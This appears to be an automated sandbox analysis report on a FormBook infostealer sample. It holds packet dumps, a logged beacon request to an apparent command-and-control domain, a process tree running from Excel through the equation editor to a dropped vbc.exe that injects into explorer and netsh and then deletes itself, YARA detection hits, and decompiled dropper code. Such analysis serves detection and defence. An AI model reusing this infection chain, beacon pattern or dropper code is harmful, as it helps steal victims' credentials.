                                              Oct 13, 2021 19:03:16.003611088 CEST11INData Raw: 70 b0 40 00 a3 74 b0 40 00 e8 cb 30 00 00 85 c0 89 45 ec 0f 8c a8 00 00 00 8b 35 70 b0 40 00 2b f3 ff 15 64 70 40 00 f6 05 f4 3f 42 00 01 8b f8 74 43 2b 45 f4 3d c8 00 00 00 77 06 83 7d 14 00 75 33 8b 45 08 ff 75 08 2b 45 14 6a 64 50 ff 15 38 71
                                              Data Ascii: p@t@0E5p@+dp@?BtC+E=w}u3Eu+EjdP8q@PEh @P4r@EPj}3;t;9EuPEPVSu4q@t19uu,uu)up@}Bu9EjjjtS9u}uVWYuHjXIu9u}u
                                              Oct 13, 2021 19:03:16.003627062 CEST12INData Raw: fb 74 40 8d 44 24 20 50 6a 28 ff 15 90 70 40 00 50 ff d5 85 c0 74 2c 8d 44 24 28 50 68 2c 91 40 00 53 ff d6 53 53 8d 44 24 2c 53 50 53 ff 74 24 34 c7 44 24 3c 01 00 00 00 c7 44 24 48 02 00 00 00 ff d7 6a 08 e8 58 2a 00 00 3b c3 be 02 00 04 80 74
                                              Data Ascii: t@D$ Pj(p@Pt,D$(Ph,@SSSD$,SPSt$4D$<D$HjX*;tVj%SSStVjr@uj?BtD$t$p@@tPp@@(jhBV5At$V6Yu^V5AjtW6wHq@W
                                              Oct 13, 2021 19:03:16.003642082 CEST14INData Raw: 71 40 00 83 fb 05 75 18 8b 44 24 2c 48 f7 d8 1b c0 23 c3 50 ff 35 10 05 42 00 ff 15 5c 72 40 00 81 fb 0d 04 00 00 75 1a ff 35 18 37 42 00 ff 15 58 72 40 00 8b 44 24 2c a3 18 37 42 00 e9 fc 03 00 00 83 fb 11 75 11 55 55 57 ff 15 28 72 40 00 33 c0
                                              Data Ascii: q@uD$,H#P5B\r@u57BXr@D$,7BuUUW(r@3@t$,VW8r@;tUUhWq@Wq@uV.u9-@~?jj_;u49-?BtW=Ajx0jsu%At$0t$0h
                                              Oct 13, 2021 19:03:16.003657103 CEST15INData Raw: 74 0a 50 ff 75 0c ff 15 4c 70 40 00 ff 76 10 ff 75 0c ff 15 44 70 40 00 8b 46 04 f6 46 14 08 89 45 f8 74 06 50 ff d7 89 45 f8 f6 46 14 04 5f 74 0a 50 ff 75 0c ff 15 5c 70 40 00 f6 46 14 10 74 21 8b 46 08 89 45 f4 8b 46 0c 85 c0 74 07 50 ff 15 50
                                              Data Ascii: tPuLp@vuDp@FFEtPEF_tPu\p@Ft!FEFtPPp@EPXp@FF3^UEAuQup@u#MA3]U}SVW]{0}7B+9x?Bs4j"ECueG


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.22491683.64.163.5080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Oct 13, 2021 19:04:58.731059074 CEST305OUTGET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1
                                              User-Agent: Windows Explorer
                                              Host: www.washingtonboatrentals.com
                                              Oct 13, 2021 19:04:58.749141932 CEST305INHTTP/1.1 410 Gone
                                              Server: openresty
                                              Date: Wed, 13 Oct 2021 17:04:57 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 77 61 73 68 69 6e 67 74 6f 6e 62 6f 61 74 72 65 6e 74 61 6c 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 35 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 61 73 68 69 6e 67 74 6f 6e 62 6f 61 74 72 65 6e 74 61 6c 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 7<html>9 <head>59 <meta http-equiv='refresh' content='5; url=http://www.washingtonboatrentals.com/' />a </head>9 <body>45 You are being redirected to http://www.washingtonboatrentals.coma </body>8</html>0


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 284 Parent PID: 596

                                              General

                                              Start time:19:02:29
                                              Start date:13/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13fc40000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: EQNEDT32.EXE PID: 2540 Parent PID: 596

                                              General

                                              Start time:19:02:51
                                              Start date:13/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: vbc.exe PID: 1292 Parent PID: 2540

                                              General

                                              Start time:19:02:55
                                              Start date:13/10/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x400000
                                              File size:290617 bytes
                                              MD5 hash:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 36%, ReversingLabs
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: vbc.exe PID: 2072 Parent PID: 1292

                                              General

                                              Start time:19:02:58
                                              Start date:13/10/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x400000
                                              File size:290617 bytes
                                              MD5 hash:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 2072

                                              General

                                              Start time:19:03:01
                                              Start date:13/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: netsh.exe PID: 1864 Parent PID: 1764

                                              General

                                              Start time:19:03:25
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\netsh.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\netsh.exe
                                              Imagebase:0x1640000
                                              File size:96256 bytes
                                              MD5 hash:784A50A6A09C25F011C3143DDD68E729
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 2544 Parent PID: 1864

                                              General

                                              Start time:19:03:29
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                              Imagebase:0x49f30000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: vbc.exe PID: 1292 Parent PID: 2540 vbc.exeCOMMON

                                                Executed Functions

                                                Function 004030FB, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			_entry_() {
				intOrPtr _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t64;
				char* _t67;
				char* _t68;
				int _t69;
				char* _t71;
				char* _t74;
				intOrPtr _t87;
				int _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t107;
				intOrPtr* _t108;
				char _t111;
				CHAR* _t116;
				char* _t117;
				CHAR* _t118;
				char* _t119;
				void* _t121;
				char* _t123;
				char* _t125;
				char* _t126;
				void* _t128;
				void* _t129;
				intOrPtr _t138;
				char _t147;

				 *(_t129 + 0x20) = 0;
				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t129 + 0x1c) = 0;
				 *(_t129 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t108 = E00405F28(0);
					if(_t108 != 0) {
						 *_t108(0xc00);
					}
				}
				_t118 = "UXTHEME";
				goto L4;
				while(1) {
					L22:
					_t111 =  *_t56;
					_t134 = _t111;
					if(_t111 == 0) {
						break;
					}
					__eflags = _t111 - 0x20;
					if(_t111 != 0x20) {
						L10:
						__eflags =  *_t56 - 0x22;
						 *((char*)(_t129 + 0x14)) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *((char*)(_t129 + 0x14)) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L20:
							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 == 0x53) {
								__eflags = (_t56[1] | 0x00000020) - 0x20;
								if((_t56[1] | 0x00000020) == 0x20) {
									_t14 = _t129 + 0x18;
									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t14;
								}
							}
							__eflags =  *_t56 - 0x4352434e;
							if( *_t56 == 0x4352434e) {
								__eflags = (_t56[4] | 0x00000020) - 0x20;
								if((_t56[4] | 0x00000020) == 0x20) {
									_t17 = _t129 + 0x18;
									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
									__eflags =  *_t17;
								}
							}
							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t56 - 2)) = 0;
								_t57 =  &(_t56[2]);
								__eflags =  &(_t56[2]);
								E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t57);
								L25:
								_t116 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t116);
								_t60 = E004030CA(_t134);
								_t135 = _t60;
								if(_t60 != 0) {
									L27:
									DeleteFileA("1033"); // executed
									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
									if(_t62 != 0) {
										L37:
										E00403511();
										__imp__OleUninitialize();
										_t143 =  *((intOrPtr*)(_t129 + 0x10));
										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
											__eflags =  *0x423fd4; // 0x0
											if(__eflags == 0) {
												L64:
												_t64 =  *0x423fec; // 0xffffffff
												__eflags = _t64 - 0xffffffff;
												if(_t64 != 0xffffffff) {
													 *(_t129 + 0x1c) = _t64;
												}
												ExitProcess( *(_t129 + 0x1c));
											}
											_t126 = E00405F28(5);
											_t119 = E00405F28(6);
											_t67 = E00405F28(7);
											__eflags = _t126;
											_t117 = _t67;
											if(_t126 != 0) {
												__eflags = _t119;
												if(_t119 != 0) {
													__eflags = _t117;
													if(_t117 != 0) {
														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
														__eflags = _t74;
														if(_t74 != 0) {
															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
															 *(_t129 + 0x3c) = 1;
															 *(_t129 + 0x48) = 2;
															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
														}
													}
												}
											}
											_t68 = E00405F28(8);
											__eflags = _t68;
											if(_t68 == 0) {
												L62:
												_t69 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t69;
												if(_t69 != 0) {
													goto L64;
												}
												goto L63;
											} else {
												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t71;
												if(_t71 == 0) {
													L63:
													E0040140B(9);
													goto L64;
												}
												goto L62;
											}
										}
										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									_t138 =  *0x423f5c; // 0x0
									if(_t138 == 0) {
										L36:
										 *0x423fec =  *0x423fec | 0xffffffff;
										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
										goto L37;
									}
									_t123 = E004056B6(_t125, 0);
									while(_t123 >= _t125) {
										__eflags =  *_t123 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t123 = _t123 - 1;
										__eflags = _t123;
									}
									_t140 = _t123 - _t125;
									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
									if(_t123 < _t125) {
										_t121 = E004053E0(_t143);
										lstrcatA(_t116, "~nsu");
										if(_t121 != 0) {
											lstrcatA(_t116, "A");
										}
										lstrcatA(_t116, ".tmp");
										_t127 = "C:\\Users\\Public";
										if(lstrcmpiA(_t116, "C:\\Users\\Public") != 0) {
											_push(_t116);
											if(_t121 == 0) {
												E004053C3();
											} else {
												E00405346();
											}
											SetCurrentDirectoryA(_t116);
											_t147 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
											if(_t147 == 0) {
												E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t127);
											}
											E00405B98(0x425000,  *(_t129 + 0x20));
											 *0x425400 = 0x41;
											_t128 = 0x1a;
											do {
												_t87 =  *0x423f50; // 0x601fd8
												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
												DeleteFileA(0x41f0f0);
												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
													_t91 = CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f0f0, 1);
													_t149 = _t91;
													if(_t91 != 0) {
														_push(0);
														_push(0x41f0f0);
														E004058E6(_t149);
														_t93 =  *0x423f50; // 0x601fd8
														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
														_t95 = E004053F8(0x41f0f0);
														if(_t95 != 0) {
															CloseHandle(_t95);
															 *((intOrPtr*)(_t129 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t128 = _t128 - 1;
												_t151 = _t128;
											} while (_t128 != 0);
											_push(0);
											_push(_t116);
											E004058E6(_t151);
										}
										goto L37;
									}
									 *_t123 = 0;
									_t124 =  &(_t123[4]);
									if(E0040576C(_t140,  &(_t123[4])) == 0) {
										goto L37;
									}
									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
									 *((intOrPtr*)(_t129 + 0x10)) = 0;
									goto L36;
								}
								GetWindowsDirectoryA(_t116, 0x3fb);
								lstrcatA(_t116, "\\Temp");
								_t107 = E004030CA(_t135);
								_t136 = _t107;
								if(_t107 == 0) {
									goto L37;
								}
								goto L27;
							} else {
								goto L20;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L10;
				}
				goto L25;
				L4:
				E00405EBA(_t118); // executed
				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
				if( *_t118 != 0) {
					goto L4;
				} else {
					E00405F28(0xd);
					_t47 = E00405F28(0xb);
					 *0x423f44 = _t47;
					__imp__#17();
					__imp__OleInitialize(0); // executed
					 *0x423ff8 = _t47;
					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405B98("kozkonzcvlkexzh Setup", "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\Public\\vbc.exe\" ";
					E00405B98(_t125, _t51);
					 *0x423f40 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M0042A001;
					}
					_t56 = CharNextA(E004056B6(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}


































                                                0x0040310c
                                                0x00403110
                                                0x00403118
                                                0x0040311c
                                                0x00403121
                                                0x00403131
                                                0x00403134
                                                0x0040313b
                                                0x00403142
                                                0x00403142
                                                0x0040313b
                                                0x00403144
                                                0x00403144
                                                0x0040325a
                                                0x0040325a
                                                0x0040325a
                                                0x0040325c
                                                0x0040325e
                                                0x00000000
                                                0x00000000
                                                0x004031f3
                                                0x004031f6
                                                0x004031fe
                                                0x004031fe
                                                0x00403201
                                                0x00403206
                                                0x00403208
                                                0x00403208
                                                0x00403209
                                                0x00403209
                                                0x0040320e
                                                0x00403211
                                                0x0040324a
                                                0x0040324f
                                                0x00403254
                                                0x00403257
                                                0x00403259
                                                0x00403259
                                                0x00403259
                                                0x00000000
                                                0x00403213
                                                0x00403213
                                                0x00403214
                                                0x00403217
                                                0x0040321f
                                                0x00403222
                                                0x00403224
                                                0x00403224
                                                0x00403224
                                                0x00403224
                                                0x00403222
                                                0x00403229
                                                0x0040322f
                                                0x00403237
                                                0x0040323a
                                                0x0040323c
                                                0x0040323c
                                                0x0040323c
                                                0x0040323c
                                                0x0040323a
                                                0x00403241
                                                0x00403248
                                                0x00403262
                                                0x00403265
                                                0x00403265
                                                0x0040326e
                                                0x00403273
                                                0x00403273
                                                0x0040327e
                                                0x00403284
                                                0x00403289
                                                0x0040328b
                                                0x004032b1
                                                0x004032b6
                                                0x004032c0
                                                0x004032c7
                                                0x004032cb
                                                0x00403332
                                                0x00403332
                                                0x00403337
                                                0x0040333d
                                                0x00403341
                                                0x00403456
                                                0x0040345c
                                                0x004034f9
                                                0x004034f9
                                                0x004034fe
                                                0x00403501
                                                0x00403503
                                                0x00403503
                                                0x0040350b
                                                0x0040350b
                                                0x0040346b
                                                0x00403474
                                                0x00403476
                                                0x0040347b
                                                0x0040347d
                                                0x0040347f
                                                0x00403481
                                                0x00403483
                                                0x00403485
                                                0x00403487
                                                0x00403497
                                                0x00403499
                                                0x0040349b
                                                0x004034a8
                                                0x004034b7
                                                0x004034bf
                                                0x004034c7
                                                0x004034c7
                                                0x0040349b
                                                0x00403487
                                                0x00403483
                                                0x004034cb
                                                0x004034d0
                                                0x004034d7
                                                0x004034e5
                                                0x004034e8
                                                0x004034ee
                                                0x004034f0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034d9
                                                0x004034df
                                                0x004034e1
                                                0x004034e3
                                                0x004034f2
                                                0x004034f4
                                                0x00000000
                                                0x004034f4
                                                0x00000000
                                                0x004034e3
                                                0x004034d7
                                                0x00403350
                                                0x00403357
                                                0x00403357
                                                0x004032cd
                                                0x004032d3
                                                0x00403322
                                                0x00403322
                                                0x0040332e
                                                0x00000000
                                                0x0040332e
                                                0x004032dc
                                                0x004032e9
                                                0x004032e0
                                                0x004032e6
                                                0x00000000
                                                0x00000000
                                                0x004032e8
                                                0x004032e8
                                                0x004032e8
                                                0x004032ed
                                                0x004032ef
                                                0x004032f7
                                                0x00403368
                                                0x0040336a
                                                0x00403371
                                                0x00403379
                                                0x00403379
                                                0x00403384
                                                0x00403389
                                                0x00403398
                                                0x0040339c
                                                0x0040339d
                                                0x004033a6
                                                0x0040339f
                                                0x0040339f
                                                0x0040339f
                                                0x004033ac
                                                0x004033b2
                                                0x004033b8
                                                0x004033c0
                                                0x004033c0
                                                0x004033ce
                                                0x004033d5
                                                0x004033de
                                                0x004033e4
                                                0x004033e4
                                                0x004033f0
                                                0x004033f6
                                                0x00403400
                                                0x0040340a
                                                0x00403410
                                                0x00403412
                                                0x00403414
                                                0x00403415
                                                0x00403416
                                                0x0040341b
                                                0x00403427
                                                0x0040342d
                                                0x00403434
                                                0x00403437
                                                0x0040343d
                                                0x0040343d
                                                0x00403434
                                                0x00403412
                                                0x00403441
                                                0x00403447
                                                0x00403447
                                                0x00403447
                                                0x0040344a
                                                0x0040344b
                                                0x0040344c
                                                0x0040344c
                                                0x00000000
                                                0x00403398
                                                0x004032f9
                                                0x004032fb
                                                0x00403306
                                                0x00000000
                                                0x00000000
                                                0x0040330e
                                                0x00403319
                                                0x0040331e
                                                0x00000000
                                                0x0040331e
                                                0x00403293
                                                0x0040329f
                                                0x004032a4
                                                0x004032a9
                                                0x004032ab
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403248
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031f8
                                                0x004031f8
                                                0x004031f8
                                                0x004031f9
                                                0x004031f9
                                                0x00000000
                                                0x004031f8
                                                0x00000000
                                                0x00403149
                                                0x0040314a
                                                0x00403156
                                                0x0040315c
                                                0x00000000
                                                0x0040315e
                                                0x00403160
                                                0x00403167
                                                0x0040316c
                                                0x00403171
                                                0x00403178
                                                0x0040317e
                                                0x00403194
                                                0x004031a4
                                                0x004031a9
                                                0x004031af
                                                0x004031b6
                                                0x004031c9
                                                0x004031ce
                                                0x004031d0
                                                0x004031d2
                                                0x004031d7
                                                0x004031d7
                                                0x004031e7
                                                0x004031ed
                                                0x00000000
                                                0x004031ed

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 00403121
                                                • GetVersion.KERNEL32 ref: 00403127
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                • OleInitialize.OLE32(00000000), ref: 00403178
                                                • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                • GetCommandLineA.KERNEL32(kozkonzcvlkexzh Setup,NSIS Error), ref: 004031A9
                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004031BC
                                                • CharNextA.USER32(00000000), ref: 004031E7
                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040327E
                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • OleUninitialize.OLE32 ref: 00403337
                                                • ExitProcess.KERNEL32 ref: 00403357
